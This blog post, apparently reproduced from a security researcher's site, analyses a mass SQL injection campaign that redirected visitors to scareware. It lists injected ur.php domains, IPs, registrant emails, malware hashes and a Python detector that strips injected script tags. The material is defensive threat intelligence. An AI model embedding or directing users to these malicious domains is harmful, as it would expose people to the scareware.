
Dissecting the Massive SQL Injection Attack Serving Scareware


A massive SQL injection attack, still ongoing, has affected hundreds of thousands of web pages across the Web; its ultimate goal is to monetize the campaign through a scareware affiliate program. Such mass SQL injection attempts are usually conducted with mass vulnerability scanning tools, aided by search engines that have already crawled the vulnerable sites.

What's particularly interesting about this campaign is that the domains used all respond to the same IPs, including the portfolios of scareware domains, which the cybercriminals naturally rotate on a periodic basis. Let's dissect the campaign and expose the domain portfolios and the entire campaign structure.

UPDATED: Related SQL injected URLs, courtesy of Websense:

SQL injected URLs:
lizamoon.com/ur.php (67,500 results) - 91.220.35.151 (AS3721); 91.213.29.182 (AS51786); 95.64.9.18 (AS50244) - Email: jamesnorthone@hotmailbox.com
alexblane.com/ur.php (3,920 results) - Email: jamesnorthone@hotmailbox.com
alisa-carter.com/ur.php (220,000 results) - Email: jamesnorthone@hotmailbox.com
t6ryt56.info/ur.php (18 results) - Email: support@ruler-domains.com
tadygus.com/ur.php (100 results) - Email: jamesnorthone@hotmailbox.com
worid-of-books.com/ur.php (334,000 results) - Email: tik0066@gmail.com

Upon successful redirection, the campaign attempts to load the scareware domain defender-nibea.in/scan1b/237 - 46.252.130.200 - Email: jimwei2969@gmail.com
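To show how a site owner would hunt for this injection pattern (a script tag pointing at some-domain/ur.php appended to stored text) and then pivot the extracted domains on shared hosting, the way the post does with its IP groupings, here is an added example; it is my own illustration, not code from the post or from any tool it mentions. The database rows and the domain-to-IP mapping are constructed, using RFC 5737 documentation addresses rather than the IPs quoted above.

```python
import re
from collections import defaultdict

# Constructed sample rows (table, row id, column value), modelled on the
# injection pattern documented in the post: a <script> tag whose src ends
# in /ur.php, appended to a text column of a compromised site.
SAMPLE_ROWS = [
    ("products", 17, "Blue widget, 2-pack<script src=http://lizamoon.com/ur.php></script>"),
    ("products", 18, "Red widget, single"),
    ("news", 3, '<p>Spring sale</p><script src="http://alisa-carter.com/ur.php"></script>'),
    ("news", 4, '<script type="text/javascript" src="/static/app.js"></script>'),
]

# Constructed hosting data for the pivot (documentation IPs, not the real ones);
# in practice this comes from passive DNS or live resolution.
SAMPLE_HOSTING = {
    "lizamoon.com": "192.0.2.10",
    "alisa-carter.com": "192.0.2.10",
    "agasi-story.info": "192.0.2.20",
}

# Matches a <script> tag whose src is <scheme>//<domain>/ur.php, with or
# without quotes, and swallows the closing </script> if it directly follows.
INJECTED_SCRIPT = re.compile(
    r'<script[^>]*\ssrc\s*=\s*["\']?(?:https?:)?//([^/"\'\s>]+)/ur\.php["\']?[^>]*>'
    r'(?:\s*</script\s*>)?',
    re.IGNORECASE,
)

def find_injected(rows):
    """Return (table, row_id, domain) for every row carrying a */ur.php script tag."""
    hits = []
    for table, row_id, value in rows:
        for m in INJECTED_SCRIPT.finditer(value):
            hits.append((table, row_id, m.group(1).lower()))
    return hits

def strip_injected(value):
    """Remove the injected tag(s) from a column value, leaving the legitimate content."""
    return INJECTED_SCRIPT.sub("", value)

def group_by_ip(domains, hosting):
    """Cluster injected domains by the IP they resolve to: the shared-infrastructure pivot."""
    clusters = defaultdict(set)
    for d in domains:
        clusters[hosting.get(d, "unresolved")].add(d)
    return {ip: sorted(ds) for ip, ds in clusters.items()}

if __name__ == "__main__":
    hits = find_injected(SAMPLE_ROWS)
    print(hits)
    print(group_by_ip({d for _, _, d in hits} | {"agasi-story.info"}, SAMPLE_HOSTING))
```

Cleaning the column is only half the job: the injection will return unless the query that wrote it is parameterized and the application's database account is stripped of write access to columns it never needs to update.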

Detection rate:
freesystemscan.exe - Trojan/Win32.FakeAV - Result: 9/41 (22.0%)
MD5: 815d77f8fca509dde1abeafabed30b65
SHA1: 1b3c35afb76c53cd9507fffee46fb58c29e72bc1
SHA256: cd902b92042435c2d70d4bf59acc2de8229bfc367626961f76c03f75dcd7e95c

Responding to 46.252.130.200 (AS25190; KIS-AS UAB "Kauno Interneto Sistemos") are also:

Rotated scareware domains involved in the campaign, responding to 84.123.115.228 (AS6739; ONO-AS Cableuropa - ONO):

The scareware domains were registered with automatically created Gmail accounts, a precaution intended to make the campaign harder to expose than it would be if a single email address had been used for every registration.

Monitoring of the campaign is ongoing.

This post has been reproduced from Dancho Danchev's blog.